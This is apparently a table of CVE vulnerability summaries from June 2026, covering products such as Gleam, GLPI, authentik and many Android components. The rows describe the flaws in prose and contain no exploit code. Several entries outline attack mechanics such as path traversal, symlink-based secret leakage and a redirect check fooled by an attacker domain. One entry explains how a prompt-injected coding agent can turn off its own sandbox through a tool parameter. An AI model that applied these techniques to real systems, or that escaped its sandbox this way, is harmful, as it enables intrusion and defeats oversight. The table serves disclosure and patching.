| Fsas Technologies Inc.--ServerView Agents for Windows | Incorrect permission assignment for critical resource issue exists in ServerView Agents for Windows V11.60.04 and earlier. If this vulnerability is exploited, a local authenticated attacker who can log in to the server where the affected product is installed may obtain SYSTEM privilege. | 2026-06-01 | not yet calculated | CVE-2026-27788 | https://www.fsastech.com/ja-jp/resources/security/2026/0529.html https://jvn.jp/en/jp/JVN67883085/ |
| Fsas Technologies Inc.--ServerView Agents for Windows | Privilege chaining issue exists in ServerView Agents for Windows V11.60.04 and earlier. If this vulnerability is exploited, a local authenticated attacker who can log in to the server where the affected product is installed may obtain SYSTEM privilege. | 2026-06-01 | not yet calculated | CVE-2026-32325 | https://www.fsastech.com/ja-jp/resources/security/2026/0529.html https://jvn.jp/en/jp/JVN67883085/ |
| Gitlawb--openclaude | OpenClaude is an open-source coding-agent command line interface for cloud and local model providers. Prior to version 0.5.1, the dangerouslyDisableSandbox parameter is exposed as part of the BashTool input schema, meaning the LLM (an untrusted principal per the project's own threat model) can set it to true in any tool_use response. Combined with the default allowUnsandboxedCommands: true setting, a prompt-injected model can escape the sandbox for any arbitrary command, achieving full host-level code execution. This issue has been patched in version 0.5.1. | 2026-06-02 | not yet calculated | CVE-2026-42074 | https://github.com/Gitlawb/openclaude/security/advisories/GHSA-m77w-p5jj-xmhg https://github.com/Gitlawb/openclaude/pull/778 https://github.com/Gitlawb/openclaude/commit/aab489055c53dd64369414116fe93226d2656273 |
| Gleam--Gleam | Path traversal vulnerability in Gleam's handling of custom documentation pages allows arbitrary file read and file write outside the intended documentation output directory. The documentation.pages entries from gleam.toml are incorporated into filesystem paths without sufficient validation or confinement to the intended project and documentation output directories. The documentation.pages[].path field can be used to write generated documentation files outside the intended build/dev/docs/<package>/ output directory. The documentation.pages[].source field can be used to read files outside the project directory and embed their contents into generated documentation output. An attacker who can convince a victim to run gleam docs build on an untrusted project, or with untrusted gleam.toml content, can cause local files readable by the victim to be included in generated documentation artifacts, and can cause generated documentation files to be written outside the intended docs output directory. This issue affects Gleam from 1.16.0 until 1.17.0. | 2026-06-02 | not yet calculated | CVE-2026-32685 | https://github.com/gleam-lang/gleam/security/advisories/GHSA-wjx8-7w8m-p4v7 https://cna.erlef.org/cves/CVE-2026-32685.html https://osv.dev/vulnerability/EEF-CVE-2026-32685 https://github.com/gleam-lang/gleam/commit/81570611906b6b0039c948037094d09a68700f3a https://github.com/gleam-lang/gleam/commit/c9230cd3045de8fd8481dae3a4557c0146df1430 |
| Gleam--Gleam | Symlink following vulnerability in Gleam's Hex package export allows files outside the project root to be embedded in the generated package tarball. The file collection helpers (gleam_files, native_files, private_files) in compiler-cli/src/fs.rs use follow_links(true) when walking publishable directories such as src/ and priv/. The collected paths are added to the package archive via add_path_to_tar in compiler-cli/src/publish.rs without verifying that the resolved target remains within the project root. A symlink placed under a publishable directory will cause gleam export hex-tarball or gleam publish to embed the contents of the symlink target into the generated Hex package. An attacker with write access to the project repository can place a symlink in src/ or priv/ pointing to an arbitrary file. When a maintainer or CI pipeline runs gleam publish or gleam export hex-tarball, local files readable by the publisher (such as secrets, tokens, or SSH keys) are silently embedded into the published package artifact. This issue affects Gleam from 0.10.0-rc1 until 1.17.0. | 2026-06-02 | not yet calculated | CVE-2026-42795 | https://github.com/gleam-lang/gleam/security/advisories/GHSA-qhh5-fg4c-8gqc https://cna.erlef.org/cves/CVE-2026-42795.html https://osv.dev/vulnerability/EEF-CVE-2026-42795 https://github.com/gleam-lang/gleam/commit/6435a5528b9ae0449e2f32be579641ec485f6866 |
| Gleam--Gleam | Path traversal vulnerability in Gleam's dependency management allows arbitrary directory deletion via malicious build/packages/packages.toml content. Package keys read from build/packages/packages.toml by LocalPackages::read_from_disc are passed without validation to paths.build_packages_package(), which constructs a filesystem path by joining the project build directory with the attacker-controlled key. The resulting path is then passed to fs::delete_directory (which calls remove_dir_all). No check is performed to ensure the path remains within the intended build/packages/ directory. Both absolute paths and relative traversal sequences (e.g. ../) are accepted as package keys, allowing deletion of arbitrary directories. An attacker who can cause a victim to run gleam deps download on a project containing a malicious build/packages/packages.toml (e.g. by committing the normally-gitignored file to a repository) can cause arbitrary directories on the victim's system to be recursively deleted. This issue affects Gleam from 0.18.0-rc1 until 1.17.0. | 2026-06-02 | not yet calculated | CVE-2026-43965 | https://github.com/gleam-lang/gleam/security/advisories/GHSA-jqvf-f6p2-wrv3 https://cna.erlef.org/cves/CVE-2026-43965.html https://osv.dev/vulnerability/EEF-CVE-2026-43965 https://github.com/gleam-lang/gleam/commit/690ca069817bee5f77a28fc3e360627c1da19291 |
| glpi-project--glpi | GLPI is a free asset and IT management software package. In versions 11.0.0 through 11.0.6, a technician can store an XSS payload in an ITIL cost. This issue has been fixed in version 11.0.7. | 2026-06-02 | not yet calculated | CVE-2026-40108 | https://github.com/glpi-project/glpi/security/advisories/GHSA-rhmv-j773-4gvh |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Starting in version 0.78 and prior to versions 10.0.25 and 11.0.7, a technician can delete arbitrary files from the filesystem as long as the webserver has write rights on them. Upgrade to 10.0.25 or 11.0.7 to receive a patch. | 2026-06-03 | not yet calculated | CVE-2026-42317 | https://github.com/glpi-project/glpi/security/advisories/GHSA-jf72-cvjh-px5w |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Starting in version 9.5.0 and prior to versions 10.0.25 and 11.0.7, low privilege users with access to planning can delete any object in GLPI. Upgrade to 11.0.7 or 10.0.25 to receive a patch. As a workaround, disable delete rights for User's planning. | 2026-06-03 | not yet calculated | CVE-2026-42318 | https://github.com/glpi-project/glpi/security/advisories/GHSA-w7mr-3vwm-2j22 |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Starting in version 0.50 and prior to versions 10.0.25 and 11.0.7, a technician can read arbitrary files inside the GLPI_DOC_DIR. Upgrade to 10.0.25 or 11.0.7 to receive a patch. | 2026-06-03 | not yet calculated | CVE-2026-42320 | https://github.com/glpi-project/glpi/security/advisories/GHSA-58j6-94cf-gcx5 |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Starting in version 10.0.4 and prior to version 10.0.25, a technician can store an XSS payload in the asset locked tab. Upgrade to 10.0.25 or 11.0.7 to receive a patch. | 2026-06-03 | not yet calculated | CVE-2026-42321 | https://github.com/glpi-project/glpi/security/advisories/GHSA-hwjc-8228-55x4 |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Starting in version 0.78 and prior to versions 10.0.25 and 11.0.7, an authenticated user with config READ permission can read a specific asset object. Upgrade to 11.0.7 or 10.0.25 to receive a patch. | 2026-06-03 | not yet calculated | CVE-2026-44281 | https://github.com/glpi-project/glpi/security/advisories/GHSA-prjc-xwmh-rhxw |
| glpi-project--glpi | An unauthenticated user with write access to the knowledge base can store an XSS payload in a knowledge base item. This issue affects glpi: before 11.0.7. | 2026-06-02 | not yet calculated | CVE-2026-5385 | https://fluidattacks.com/es/advisories/bizkit https://github.com/glpi-project/glpi https://github.com/glpi-project/glpi/security/advisories/GHSA-2fg5-jg72-h338 https://github.com/glpi-project/glpi/releases/tag/11.0.7 |
| GNCC--GP5 v7.1.76 | GNCC GP5 v7.1.76 was discovered to store sensitive wireless network information in plaintext during routine operations to the serial console. This issue allows physically-proximate attackers to obtain sensitive information, including network credentials, via monitoring the serial UART interface. | 2026-06-04 | not yet calculated | CVE-2026-36174 | http://gncc.com http://gp5.com https://github.com/BadChemical/IoT-Vulnerability-Research-Public/blob/main/GNCC-GP5-T23/README.md |
| GNCC--GP5 v7.1.76 | An issue in the U-Boot component of GNCC GP5 v7.1.76 allows physically-proximate attackers to bypass authentication and gain root access via interrupting the boot sequence and injecting a crafted string into the kernel boot arguments. | 2026-06-04 | not yet calculated | CVE-2026-36175 | http://gncc.com http://gp5.com https://github.com/BadChemical/IoT-Vulnerability-Research-Public/blob/main/GNCC-GP5-T23/README.md |
| GNCC--GP5 v7.1.76 | GNCC GP5 v7.1.76 was discovered to store pre-signed Backblaze B2 upload URLs (PUT requests) in plaintext to the serial console. This allows physically-proximate attackers to extract these active tokens to perform unauthorized operations via monitoring the serial UART interface. | 2026-06-04 | not yet calculated | CVE-2026-36176 | http://gncc.com http://gp5.com https://github.com/BadChemical/IoT-Vulnerability-Research-Public/blob/main/GNCC-GP5-T23/README.md |
| GNCC--GP5 v7.1.76 | The factory reset functionality in GNCC GP5 v7.1.76 fails to clear sensitive cryptographic material in the JFFS2 configuration partition, possibly allowing attackers to recover and obtain sensitive user data. | 2026-06-04 | not yet calculated | CVE-2026-36178 | http://gncc.com http://gp5.com https://github.com/BadChemical/IoT-Vulnerability-Research-Public/blob/main/GNCC-GP5-T23/README.md |
| GNCC--GP5 v7.1.76 | A lack of runtime integrity in GNCC GP5 v7.1.76 allows physically-proximate attackers to bypass file system read-only protections and modify system files and binaries for the duration of a boot session via a bind-mount attack. | 2026-06-04 | not yet calculated | CVE-2026-36180 | http://gncc.com http://gp5.com https://github.com/BadChemical/IoT-Vulnerability-Research-Public/blob/main/GNCC-GP5-T23/README.md |
| GNCC--GP5 v7.1.76 | GNCC GP5 v7.1.76 was discovered to utilize a weak hashing algorithm to protect the root password, possibly allowing attackers to obtain root credentials and privileges via a brute-force attack. | 2026-06-04 | not yet calculated | CVE-2026-36182 | http://gncc.com http://gp5.com https://github.com/BadChemical/IoT-Vulnerability-Research-Public/blob/main/GNCC-GP5-T23/README.md |
| Go standard library--crypto/x509 | (*x509.Certificate).VerifyHostname previously called matchHostnames in a loop over all DNS Subject Alternative Name (SAN) entries. This caused strings.Split(host, ".") to execute repeatedly on the same input hostname. With a large DNS SAN list, verification costs scaled quadratically based on the number of SAN entries multiplied by the hostname's label count. Because x509.Verify validates hostnames before building the certificate chain, this overhead occurred even for untrusted certificates. | 2026-06-02 | not yet calculated | CVE-2026-27145 | https://go.dev/cl/783621 https://go.dev/issue/79694 https://groups.google.com/g/golang-announce/c/tKs3rmcBcKw https://pkg.go.dev/vuln/GO-2026-5037 |
| Go standard library--mime | Decoding a maliciously-crafted MIME header containing many invalid encoded-words can consume excessive CPU. | 2026-06-02 | not yet calculated | CVE-2026-42504 | https://go.dev/issue/79217 https://go.dev/cl/774481 https://groups.google.com/g/golang-announce/c/tKs3rmcBcKw https://pkg.go.dev/vuln/GO-2026-5038 |
| Go standard library--net/textproto | When returning errors, functions in the net/textproto package would include its input as part of the error. This might allow an attacker to inject misleading content to errors that are printed or logged. | 2026-06-02 | not yet calculated | CVE-2026-42507 | https://go.dev/issue/79346 https://go.dev/cl/777060 https://groups.google.com/g/golang-announce/c/tKs3rmcBcKw https://pkg.go.dev/vuln/GO-2026-5039 |
| goauthentik--authentik | authentik is an open-source identity provider. Prior to version 2026.2.3, the WS-Federation provider validates the user-supplied wreply parameter using a raw string prefix check rather than proper URL parsing. An attacker who can craft a login link can supply a wreply value on a different origin that passes the check (e.g. https://portal.example.com.evil.tld/), causing the victim's browser to POST the signed WS-Federation login response to attacker-controlled infrastructure. This issue has been patched in version 2026.2.3. | 2026-06-02 | not yet calculated | CVE-2026-41569 | https://github.com/goauthentik/authentik/security/advisories/GHSA-995q-72cw-cfw3 |
| goauthentik--authentik | authentik is an open-source identity provider. Prior to versions 2025.12.5 and 2026.2.3, the SAML source response processor (ResponseProcessor.parse()) does not validate the Conditions element on assertions. NotBefore, NotOnOrAfter, and AudienceRestriction are all ignored. This allows replay of expired assertions and acceptance of assertions intended for other service providers. This issue has been patched in versions 2025.12.5 and 2026.2.3. | 2026-06-02 | not yet calculated | CVE-2026-41577 | https://github.com/goauthentik/authentik/security/advisories/GHSA-4v4x-x5pr-8gp2 |
| Gobgp--Gobgp | An integer underflow in the BGPUpdate.DecodeFromBytes function (/bgp/bgp.go) of gobgp v4.3.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted BGP UPDATE message. | 2026-06-03 | not yet calculated | CVE-2026-37462 | https://github.com/osrg/gobgp/blob/v4.3.0/pkg/packet/bgp/bgp.go https://github.com/osrg/gobgp/commit/9ce8936672ebc07df524da77fa4c6ae26d92be6d |
| Google--Android | In multiple locations, there is a possible way to reveal images across users due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-22424 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In many functions of ComputerEngine.java, there is a possible way to access URIs across users due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-22426 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In setUserDisclaimerAcknowledged of CarDevicePolicyService.java, there is a possible way to bypass the user dialog when adding an account to a managed device due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-26418 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple locations, there is a possible background activity launch due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-32348 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of PipTaskOrganizer.java, there is a possible way to launch an activity from the background due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-48570 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple locations, there is a possible way to achieve code execution due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-48595 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of KeyguardViewMediator.java, there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-48616 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In isSameApp of NotificationManagerService.java, there is a possible persistent DoS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-48648 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple locations, there is a possible way to reset user-selected permissions selections due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-48649 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In performPreInstallChecks of InstallRepository.kt, there is a possible way to bypass MDM policy due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-48652 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple locations, there is a possible tapjacking due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0009 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In updateProvidersWhenServiceRemoved of CredentialManagerService.java, there is a possible way to override settings across users due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0016 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of AccessibilityManagerService.java, there is a possible persistent denial of service due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0018 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In startAnimation of StageCoordinator.java, there is a possible tapjacking issue due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0036 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible persistent denial of service due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0039 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible way to cause a crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0040 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible UBSan failure due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0041 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0042 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible persistent denial of service due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0043 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible way to cause the system to crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0044 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In bta_jv_rfcomm_connect of bta_jv_act.cc, there is a possible bypass of bonding for a secure connection due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0045 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In InputInterceptor of Letterbox.java, there is a possible way to trick a user into accepting a permission due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0046 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In hide of WindowState.java, there is a possible way to trick the user into approving permissions due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0048 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In handleBondStateChanged of AdapterService.java, there is a possible sensitive information disclosure due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0050 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible way to cause a system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0051 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible way to cause a crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0052 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In createSessionInternal of PackageInstallerService.java, there is a possible way to update a Device Policy Controller (DPC) into an invalid directory due to a path traversal error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0055 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In setTo of ResourceTypes.cpp, there is a possible read out of bounds due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0056 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of sdp_discovery.cc, there is a possible way to achieve code execution due to a heap buffer overflow. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0059 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In updateState of GraphicsDriverEnableAngleAsSystemDriverController.java, there is a possible persistent DoS issue due to an unusual root cause. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0060 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of WindowState.java, there is a possible way to trick a user into accepting a permission due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0061 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible way to cause a permanent denial of service due to a logic error in the code. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0067 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In verifySignature of ApkChecksums.java, there is a possible way to cause a crash due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0069 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of DevicePolicyManagerService.java, there is a possible way to hide a system critical package due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0070 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In getPreferredSize of LauncherProcessImageListener.kt, there is a possible denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0074 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions, there is a possible way to access the contacts database due to a SQL injection. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0075 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In validateNode of ResourceTypes.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0076 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In resumeConfigurationDispatch of ActivityRecord.java, there is a possible background application launch (bal) due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0077 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In setGlobalProxy of DevicePolicyManagerService.java, there is a possible desync in persistence due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0078 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible persistent denial of service due to an integer overflow. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0079 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible way to cause a crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0080 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In applySimpleFieldMaxSize of DataRowHandler.java, there is a possible way to insert a large contact name due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0085 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In onCreate of DisableSupervisionActivity.kt, there is a possible way to delete supervision data due to a missing null check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0086 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In approvalLevelForDomainInternal of DomainVerificationService.java, there is a possible way to hijack an arbitrary app link due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0087 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In getCallingAppLabel of CertInstaller.java, there is a possible way to hide a sensitive security dialogue due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0088 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of PackageInstallerService.java, there is a possible way to install unverified apps due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0089 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple locations, there is a possible way to execute code in the launcher process due to an over-privileged shell user. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0091 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple locations, there is a possible misleading UI due to obfuscation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0093 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In getApplicationLabel of KeyChainActivity.java, there is a possible way to trick the user into approving access to certificates due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0094 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In l2c_fcr_clone_buf of l2c_fcr.cc, there is a possible way to trigger controlled heap corruption within the privileged Bluetooth process due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0095 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In getAppLabel of ForgetDeviceDialogFragment.java, there is a possible way to trick the user into forgetting a device due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0096 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple locations, there is a possible way to bypass user interaction when pairing an LE device due to a logic error. This could lead to remote (proximal/adjacent) escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0097 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In getCallingPackageName of Shared.java, there is a possible way to bypass activity start restrictions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0098 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In onNullBinding of HostEmulationManager.java, there is a possible way to launch an activity from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0099 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In Load of LoadedArsc.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0100 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In addWindow of WindowManagerService.java, there is a possible tapjacking issue due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-28577 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of DevicePolicyManagerService.java, there is a possible desync from persistence due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-28578 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions, there is a possible desync in persistence due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-28580 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In fixInitiatingUserIfNecessary of CallIntentProcessor.java, there is a possible way to make an emergency call due to a logic error in the code. This could lead to local with null execution privileges needed. User interaction is null for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-28581 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of AppOpsService.java, there is a possible missing permission check due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-28586 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
